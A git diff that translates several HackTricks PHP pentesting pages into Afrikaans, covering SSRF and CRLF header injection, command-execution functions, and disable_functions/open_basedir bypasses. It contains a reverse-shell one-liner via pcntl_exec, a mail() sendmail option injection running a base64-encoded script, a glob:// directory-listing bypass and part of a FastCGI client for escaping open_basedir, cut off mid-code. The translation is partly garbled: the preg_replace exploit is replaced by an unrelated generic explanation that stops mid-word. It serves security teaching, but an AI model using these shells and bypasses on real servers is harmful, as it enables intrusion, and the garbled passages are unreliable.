 
-A method described in the [**original writeup**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) involves uploading files that trigger a server crash before deletion. By brute-forcing the name of the temporary file, it becomes possible for Imagick to execute arbitrary PHP code. However, this technique was found to be effective only in an outdated version of ImageMagick.
+'n Metode wat in die [**oorspronklike skryfstuk**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) beskryf word, behels die oplaai van lêers wat 'n bedienercrash veroorsaak voordat dit uitgewis word. Deur die naam van die tydelike lêer met brute force te raai, word dit moontlik vir Imagick om arbitrêre PHP-kode uit te voer. Hierdie tegniek was egter slegs effektief in 'n verouderde weergawe van ImageMagick.
 
-## References
+## Verwysings
 
 * [https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
index 51d5d97ad..c5f171820 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md
@@ -2,43 +2,40 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 

 
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
+Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regstel. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag nog gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
 
 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 
 ***
 
-### SSRF PHP functions
-
-Some function such as _**file\_get\_contents(), fopen(), file(), md5\_file()**accept URLs as input that they will follow making **possible SSRF vulnerabilities** if the use can control the data:
+### SSRF PHP-funksies
 
+Sommige funksies soos _**file\_get\_contents(), fopen(), file(), md5\_file()**aanvaar URL's as insette wat hulle sal volg en **moontlike SSRF-kwesbaarhede** kan veroorsaak as die gebruiker die data kan beheer:
 ```php
 file_get_contents("http://127.0.0.1:8081");
 fopen("http://127.0.0.1:8081", "r");
 file("http://127.0.0.1:8081");
 md5_file("http://127.0.0.1:8081");
 ```
-
 ### CRLF
 
-Moreover, in some cases it might be even possible to send arbitrary headers via CRLF "vulnerabilities" in the previous functions:
-
+Verder, in sommige gevalle is dit selfs moontlik om arbitrêre koppe via CRLF "kwesbaarhede" in die vorige funksies te stuur:
 ```php
-# The following will create a header called from with value Hi and 
+# The following will create a header called from with value Hi and
 # an extra header "Injected: I HAVE IT"
 ini_set("from", "Hi\r\nInjected: I HAVE IT");
 file_get_contents("http://127.0.0.1:8081");
@@ -51,46 +48,43 @@ Connection: close
 
 # Any of the previously mentioned functions will send those headers
 ```
-
 {% hint style="warning" %}
-For more info about that CRLF vuln, check this bug [https://bugs.php.net/bug.php?id=81680\&edit=1](https://bugs.php.net/bug.php?id=81680\&edit=1)
+Vir meer inligting oor daardie CRLF kwesbaarheid, kyk na hierdie fout [https://bugs.php.net/bug.php?id=81680\&edit=1](https://bugs.php.net/bug.php?id=81680\&edit=1)
 {% endhint %}
 
-Note that these function might have other methods to set arbitrary headers in requests, like:
-
+Let daarop dat hierdie funksie ander metodes kan hê om willekeurige koppe in versoeke te stel, soos:
 ```php
 $url = "";
 
 $options = array(
-  'http'=>array(
-    'method'=>"GET",
-    'header'=>"Accept-language: en\r\n" .
-              "Cookie: foo=bar\r\n" .  // check function.stream-context-create on php.net
-              "User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10\r\n" // i.e. An iPad 
-  )
+'http'=>array(
+'method'=>"GET",
+'header'=>"Accept-language: en\r\n" .
+"Cookie: foo=bar\r\n" .  // check function.stream-context-create on php.net
+"User-Agent: Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10\r\n" // i.e. An iPad
+)
 );
 
 $context = stream_context_create($options);
 $file = file_get_contents($url, false, $context);
 ```
-
 

 
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
+Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
 
 {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
 
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
index 74c88377e..00929b0dd 100644
--- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
+++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md
@@ -1,91 +1,97 @@
-# PHP - Useful Functions & disable\_functions/open\_basedir bypass
+# PHP - Nuttige Funksies & disable\_functions/open\_basedir omseil
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

 
-## PHP Command & Code Execution
+## PHP Opdrag & Kode Uitvoering
 
-### PHP Command Execution
+### PHP Opdrag Uitvoering
 
-**Note:** A [p0wny-shell](https://github.com/flozz/p0wny-shell/blob/master/shell.php) php webshell can **automatically** check and bypass the following function if some of them be disabled.
-
-**exec** - Returns last line of commands output
+**Nota:** 'n [p0wny-shell](https://github.com/flozz/p0wny-shell/blob/master/shell.php) php-webshell kan die volgende funksie **outomaties** toets en omseil as sommige van hulle gedeaktiveer is.
 
+**exec** - Gee die laaste lyn van die opdrag se uitset terug
 ```bash
 echo exec("uname  -a");
 ```
-
-**passthru** - Passes commands output directly to the browser
-
+**passthru** - Stuur bevels uitvoer direk na die blaaier
 ```bash
 echo passthru("uname -a");
 ```
-
-**system** - Passes commands output directly to the browser and returns last line
-
+**sisteem** - Gee bevele uitset direk aan die blaaier en gee die laaste lyn terug
 ```bash
 echo system("uname -a");
 ```
-
-**shell\_exec** - Returns commands output
-
+**shell\_exec** - Gee die uitset van opdragte terug
 ```bash
 echo shell_exec("uname -a");
 ```
-
-\`\` (backticks) - Same as shell\_exec()
-
+\`\` (backticks) - Dieselfde as shell\_exec()
 ```bash
 echo `uname -a`
 ```
-
-**popen** - Opens read or write pipe to process of a command
-
+**popen** - Maak 'n lees- of skryf-pyp oop na 'n proses van 'n opdrag
 ```bash
 echo fread(popen("/bin/ls /", "r"), 4096);
 ```
-
-**proc\_open** - Similar to popen() but greater degree of control
-
+**proc\_open** - Soortgelyk aan popen(), maar met 'n groter mate van beheer.
 ```bash
 proc_close(proc_open("uname -a",array(),$something));
 ```
-
 **preg\_replace**
 
+Die `preg\_replace`-funksie in PHP word gebruik om 'n patroon in 'n teksreeks te soek en te vervang met 'n ander waarde. Dit maak gebruik van regulêre uitdrukkings om die soek- en vervangingsproses uit te voer.
+
+Hier is die sintaksis vir die gebruik van `preg\_replace`:
+
+```php
+preg_replace($pattern, $replacement, $subject);
+```
+
+- `$pattern` is die regulêre uitdrukking wat gebruik word om die teksreeks te soek.
+- `$replacement` is die waarde wat gebruik word om die ooreenstemmende patroon te vervang.
+- `$subject` is die teksreeks waarin die soek- en vervangingsproses uitgevoer word.
+
+Hier is 'n voorbeeld van hoe `preg\_replace` gebruik kan word:
+
+```php
+$text = "Hello, world!";
+$pattern = "/world/";
+$replacement = "universe";
+
+$newText = preg_replace($pattern, $replacement, $text);
+echo $newText; // Output: Hello, universe!
+```
+
+In hierdie voorbeeld word die woord "world" in die teksreeks "Hello, world!" vervang met die woord "universe". Die `preg\_replace`-funksie soek na die patroon "/world/" in die teksreeks en vervang dit met die waarde "universe". Die nuwe teksreeks, "Hello, universe!", word dan uitgevoer.
+
+Dit is belangrik om te onthou dat `preg\_replace` 'n regulêre uitdrukking gebruik om te soek na ooreenstemmende patrone. Dit beteken dat jy spesiale karakters moet ontsnap met 'n sku
 ```php
 
 ```
-
-**pcntl\_exec** - Executes a program (by default in modern and not so modern PHP you need to load the `pcntl.so` module to use this function)
-
+**pcntl\_exec** - Voer 'n program uit (standaard moet jy die `pcntl.so` module laai om hierdie funksie in moderne en nie so moderne PHP te gebruik)
 ```bash
 pcntl_exec("/bin/bash", ["-c", "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"]);
 ```
-
-**mail / mb\_send\_mail** - This function is used to send mails, but it can also be abused to inject arbitrary commands inside the `$options` parameter. This is because **php `mail` function** usually call `sendmail` binary inside the system and it allows you to **put extra options**. However, you won't be able to see the output of the executed command, so it's recommended to create shell script that writes the output to a file, execute it using mail, and print the output:
-
+**pos / mb_send_mail** - Hierdie funksie word gebruik om e-posse te stuur, maar dit kan ook misbruik word om willekeurige opdragte in die `$options` parameter in te spuit. Dit is omdat die **php `mail` funksie** gewoonlik die `sendmail` binêre lêer in die stelsel aanroep en dit jou toelaat om **ekstra opsies** in te voer. Jy sal egter nie die uitset van die uitgevoerde opdrag kan sien nie, so dit word aanbeveel om 'n skripsie te skep wat die uitset na 'n lêer skryf, dit uit te voer met behulp van mail, en die uitset te druk:
 ```bash
 file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA+IC90bXAvZmxhZy50eHQKCg==')); chmod('/www/readflag.sh', 0777);  mail('', '', '', '', '-H \"exec /www/readflag.sh\"'); echo file_get_contents('/tmp/flag.txt');
 ```
+**dl** - Hierdie funksie kan gebruik word om 'n PHP-uitbreiding dinamies te laai. Hierdie funksie sal nie altyd beskikbaar wees nie, so jy moet eers nagaan of dit beskikbaar is voordat jy probeer om dit uit te buit. Lees [hierdie bladsy om te leer hoe om hierdie funksie uit te buit](disable\_functions-bypass-dl-function.md).
 
-**dl** - This function can be used to dynamically load a PHP extension. This function won't be present always, so you should check if it's available before trying to exploit it. Read[ this page to learn how to exploit this function](disable\_functions-bypass-dl-function.md).
-
-### PHP Code Execution
-
-Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.
+### PHP Kode Uitvoering
 
+Afgesien van eval is daar ander maniere om PHP-kode uit te voer: include/require kan gebruik word vir afgeleë kode-uitvoering in die vorm van plaaslike lêer insluiting en afgeleë lêer insluiting kwesbaarhede.
 ```php
 ${}              // If your input gets reflected in any PHP string, it will be executed.
 eval()
@@ -105,13 +111,12 @@ $func->invokeArgs(array());
 
 // or serialize/unserialize function
 ```
-
 ## disable\_functions & open\_basedir
 
-**Disabled functions** is the setting that can be configured in `.ini` files in PHP that will **forbid** the use of the indicated **functions**. **Open basedir** is the setting that indicates to PHP the folder that it can access.\
-The PHP setting sue to be configured in the path _/etc/php7/conf.d_ or similar.
+**Gedeaktiveerde funksies** is die instelling wat in `.ini` lêers in PHP gekonfigureer kan word om die gebruik van die aangeduide **funksies** te **verbied**. **Open basedir** is die instelling wat aan PHP aandui watter vouer toeganklik is.\
+Die PHP-instelling moet gekonfigureer word in die pad _/etc/php7/conf.d_ of soortgelyk.
 
-Both configuration can be seen in the output of **`phpinfo()`**:
+Beide konfigurasies kan gesien word in die uitset van **`phpinfo()`**:
 
 ![](https://0xrick.github.io/images/hackthebox/kryptos/17.png)
 
@@ -119,436 +124,431 @@ Both configuration can be seen in the output of **`phpinfo()`**:
 
 ## open\_basedir Bypass
 
-`open_basedir` will configure the folders that PHP can access, you **won't be able to to write/read/execute any file outside** those folders, but also you **won't even be able to list** other directories.\
-However, if somehow you are able to execute arbitrary PHP code you can **try** the following chunk of **codes** to try to **bypass** the restriction.
+`open_basedir` sal die vouers konfigureer wat PHP kan toegang gee, jy **sal nie in staat wees om enige lêer buite** daardie vouers te skryf/lees/uit te voer nie, maar jy **sal selfs nie in staat wees om** ander gidslys te maak nie.\
+As jy egter op een of ander manier arbitrêre PHP-kode kan uitvoer, kan jy die volgende stuk **kodes** probeer om die beperking te **omseil**.
 
-### Listing dirs with glob:// bypass
-
-In this first example the `glob://` protocol with some path bypass is used:
+### Gidslyste met glob:// omseiling
 
+In hierdie eerste voorbeeld word die `glob://`-protokol met 'n omseiling van 'n pad gebruik:
 ```php
 __toString();
+foreach($it as $f) {
+$file_list[] = $f->__toString();
 }
 $it = new DirectoryIterator("glob:///v??/run/.*");
-foreach($it as $f) {  
-    $file_list[] = $f->__toString();
+foreach($it as $f) {
+$file_list[] = $f->__toString();
 }
-sort($file_list);  
-foreach($file_list as $f){  
-        echo "{$f}
";
+sort($file_list);
+foreach($file_list as $f){
+echo "{$f}
";
 }
 ```
+**Nota1**: In die pad kan jy ook `/e??/*` gebruik om `/etc/*` en enige ander vouer te lys.\
+**Nota2**: Dit lyk asof 'n deel van die kode gekopieer is, maar dit is eintlik nodig!\
+**Nota3**: Hierdie voorbeeld is slegs nuttig om vouers te lys en nie om lêers te lees nie
 
-**Note1**: In the path you can also use `/e??/*` to list `/etc/*` and any other folder.\
-**Note2**: It looks like part of the code is duplicated, but that's actually necessary!\
-**Note3**: This example is only useful to list folders not to read files
+### Volledige open\_basedir omseil deur FastCGI te misbruik
 
-### Full open\_basedir bypass abusing FastCGI
-
-If you want to **learn more about PHP-FPM and FastCGI** you can read the [first section of this page](disable\_functions-bypass-php-fpm-fastcgi.md).\
-If **`php-fpm`** is configured you can abuse it to completely bypass **open\_basedir**:
+As jy meer wil leer oor PHP-FPM en FastCGI kan jy die [eerste gedeelte van hierdie bladsy](disable\_functions-bypass-php-fpm-fastcgi.md) lees.\
+As **`php-fpm`** gekonfigureer is, kan jy dit misbruik om heeltemal **open\_basedir** te omseil:
 
 ![](<../../../../.gitbook/assets/image (350).png>)
 
 ![](<../../../../.gitbook/assets/image (349).png>)
 
-Note that the first thing you need to do is find where is the **unix socket of php-fpm**. It use to be under `/var/run` so you can **use the previous code to list the directory and find it**.\
-Code from [here](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy).
-
+Let daarop dat die eerste ding wat jy moet doen, is om uit te vind waar die **unix-socket van php-fpm** is. Dit word gewoonlik onder `/var/run` gevind, sodat jy die vorige kode kan gebruik om die gids te lys en dit te vind.\
+Kode van [hier](https://balsn.tw/ctf\_writeup/20190323-0ctf\_tctf2019quals/#wallbreaker-easy).
 ```php
 
- * @version     1.0
- */
+* Handles communication with a FastCGI application
+*
+* @author      Pierrick Charron 
+* @version     1.0
+*/
 class FCGIClient
 {
-    const VERSION_1            = 1;
-    const BEGIN_REQUEST        = 1;
-    const ABORT_REQUEST        = 2;
-    const END_REQUEST          = 3;
-    const PARAMS               = 4;
-    const STDIN                = 5;
-    const STDOUT               = 6;
-    const STDERR               = 7;
-    const DATA                 = 8;
-    const GET_VALUES           = 9;
-    const GET_VALUES_RESULT    = 10;
-    const UNKNOWN_TYPE         = 11;
-    const MAXTYPE              = self::UNKNOWN_TYPE;
-    const RESPONDER            = 1;
-    const AUTHORIZER           = 2;
-    const FILTER               = 3;
-    const REQUEST_COMPLETE     = 0;
-    const CANT_MPX_CONN        = 1;
-    const OVERLOADED           = 2;
-    const UNKNOWN_ROLE         = 3;
-    const MAX_CONNS            = 'MAX_CONNS';
-    const MAX_REQS             = 'MAX_REQS';
-    const MPXS_CONNS           = 'MPXS_CONNS';
-    const HEADER_LEN           = 8;
-    /**
-     * Socket
-     * @var Resource
-     */
-    private $_sock = null;
-    /**
-     * Host
-     * @var String
-     */
-    private $_host = null;
-    /**
-     * Port
-     * @var Integer
-     */
-    private $_port = null;
-    /**
-     * Keep Alive
-     * @var Boolean
-     */
-    private $_keepAlive = false;
-    /**
-     * Constructor
-     *
-     * @param String $host Host of the FastCGI application
-     * @param Integer $port Port of the FastCGI application
-     */
-    public function __construct($host, $port = 9000) // and default value for port, just for unixdomain socket
-    {
-        $this->_host = $host;
-        $this->_port = $port;
-    }
-    /**
-     * Define whether or not the FastCGI application should keep the connection
-     * alive at the end of a request
-     *
-     * @param Boolean $b true if the connection should stay alive, false otherwise
-     */
-    public function setKeepAlive($b)
-    {
-        $this->_keepAlive = (boolean)$b;
-        if (!$this->_keepAlive && $this->_sock) {
-            fclose($this->_sock);
-        }
-    }
-    /**
-     * Get the keep alive status
-     *
-     * @return Boolean true if the connection should stay alive, false otherwise
-     */
-    public function getKeepAlive()
-    {
-        return $this->_keepAlive;
-    }
-    /**
-     * Create a connection to the FastCGI application
-     */
-    private function connect()
-    {
-        if (!$this->_sock) {
-            //$this->_sock = fsockopen($this->_host, $this->_port, $errno, $errstr, 5);
-            $this->_sock = stream_socket_client($this->_host, $errno, $errstr, 5);
-            if (!$this->_sock) {
-                throw new Exception('Unable to connect to FastCGI application');
-            }
-        }
-    }
-    /**
-     * Build a FastCGI packet
-     *
-     * @param Integer $type Type of the packet
-     * @param String $content Content of the packet
-     * @param Integer $requestId RequestId
-     */
-    private function buildPacket($type, $content, $requestId = 1)
-    {
-        $clen = strlen($content);
-        return chr(self::VERSION_1)         /* version */
-            . chr($type)                    /* type */
-            . chr(($requestId >> 8) & 0xFF) /* requestIdB1 */
-            . chr($requestId & 0xFF)        /* requestIdB0 */
-            . chr(($clen >> 8 ) & 0xFF)     /* contentLengthB1 */
-            . chr($clen & 0xFF)             /* contentLengthB0 */
-            . chr(0)                        /* paddingLength */
-            . chr(0)                        /* reserved */
-            . $content;                     /* content */
-    }
-    /**
-     * Build an FastCGI Name value pair
-     *
-     * @param String $name Name
-     * @param String $value Value
-     * @return String FastCGI Name value pair
-     */
-    private function buildNvpair($name, $value)
-    {
-        $nlen = strlen($name);
-        $vlen = strlen($value);
-        if ($nlen < 128) {
-            /* nameLengthB0 */
-            $nvpair = chr($nlen);
-        } else {
-            /* nameLengthB3 & nameLengthB2 & nameLengthB1 & nameLengthB0 */
-            $nvpair = chr(($nlen >> 24) | 0x80) . chr(($nlen >> 16) & 0xFF) . chr(($nlen >> 8) & 0xFF) . chr($nlen & 0xFF);
-        }
-        if ($vlen < 128) {
-            /* valueLengthB0 */
-            $nvpair .= chr($vlen);
-        } else {
-            /* valueLengthB3 & valueLengthB2 & valueLengthB1 & valueLengthB0 */
-            $nvpair .= chr(($vlen >> 24) | 0x80) . chr(($vlen >> 16) & 0xFF) . chr(($vlen >> 8) & 0xFF) . chr($vlen & 0xFF);
-        }
-        /* nameData & valueData */
-        return $nvpair . $name . $value;
-    }
-    /**
-     * Read a set of FastCGI Name value pairs
-     *
-     * @param String $data Data containing the set of FastCGI NVPair
-     * @return array of NVPair
-     */
-    private function readNvpair($data, $length = null)
-    {
-        $array = array();
-        if ($length === null) {
-            $length = strlen($data);
-        }
-        $p = 0;
-        while ($p != $length) {
-            $nlen = ord($data{$p++});
-            if ($nlen >= 128) {
-                $nlen = ($nlen & 0x7F << 24);
-                $nlen |= (ord($data{$p++}) << 16);
-                $nlen |= (ord($data{$p++}) << 8);
-                $nlen |= (ord($data{$p++}));
-            }
-            $vlen = ord($data{$p++});
-            if ($vlen >= 128) {
-                $vlen = ($nlen & 0x7F << 24);
-                $vlen |= (ord($data{$p++}) << 16);
-                $vlen |= (ord($data{$p++}) << 8);
-                $vlen |= (ord($data{$p++}));
-            }
-            $array[substr($data, $p, $nlen)] = substr($data, $p+$nlen, $vlen);
-            $p += ($nlen + $vlen);
-        }
-        return $array;
-    }
-    /**
-     * Decode a FastCGI Packet
-     *
-     * @param String $data String containing all the packet
-     * @return array
-     */
-    private function decodePacketHeader($data)
-    {
-        $ret = array();
-        $ret['version']       = ord($data{0});
-        $ret['type']          = ord($data{1});
-        $ret['requestId']     = (ord($data{2}) << 8) + ord($data{3});
-        $ret['contentLength'] = (ord($data{4}) << 8) + ord($data{5});
-        $ret['paddingLength'] = ord($data{6});
-        $ret['reserved']      = ord($data{7});
-        return $ret;
-    }
-    /**
-     * Read a FastCGI Packet
-     *
-     * @return array
-     */
-    private function readPacket()
-    {
-        if ($packet = fread($this->_sock, self::HEADER_LEN)) {
-            $resp = $this->decodePacketHeader($packet);
-            $resp['content'] = '';
-            if ($resp['contentLength']) {
-                $len  = $resp['contentLength'];
-                while ($len && $buf=fread($this->_sock, $len)) {
-                    $len -= strlen($buf);
-                    $resp['content'] .= $buf;
-                }
-            }
-            if ($resp['paddingLength']) {
-                $buf=fread($this->_sock, $resp['paddingLength']);
-            }
-            return $resp;
-        } else {
-            return false;
-        }
-    }
-    /**
-     * Get Informations on the FastCGI application
-     *
-     * @param array $requestedInfo information to retrieve
-     * @return array
-     */
-    public function getValues(array $requestedInfo)
-    {
-        $this->connect();
-        $request = '';
-        foreach ($requestedInfo as $info) {
-            $request .= $this->buildNvpair($info, '');
-        }
-        fwrite($this->_sock, $this->buildPacket(self::GET_VALUES, $request, 0));
-        $resp = $this->readPacket();
-        if ($resp['type'] == self::GET_VALUES_RESULT) {
-            return $this->readNvpair($resp['content'], $resp['length']);
-        } else {
-            throw new Exception('Unexpected response type, expecting GET_VALUES_RESULT');
-        }
-    }
-    /**
-     * Execute a request to the FastCGI application
-     *
-     * @param array $params Array of parameters
-     * @param String $stdin Content
-     * @return String
-     */
-    public function request(array $params, $stdin)
-    {
-        $response = '';
-        $this->connect();
-        $request = $this->buildPacket(self::BEGIN_REQUEST, chr(0) . chr(self::RESPONDER) . chr((int) $this->_keepAlive) . str_repeat(chr(0), 5));
-        $paramsRequest = '';
-        foreach ($params as $key => $value) {
-            $paramsRequest .= $this->buildNvpair($key, $value);
-        }
-        if ($paramsRequest) {
-            $request .= $this->buildPacket(self::PARAMS, $paramsRequest);
-        }
-        $request .= $this->buildPacket(self::PARAMS, '');
-        if ($stdin) {
-            $request .= $this->buildPacket(self::STDIN, $stdin);
-        }
-        $request .= $this->buildPacket(self::STDIN, '');
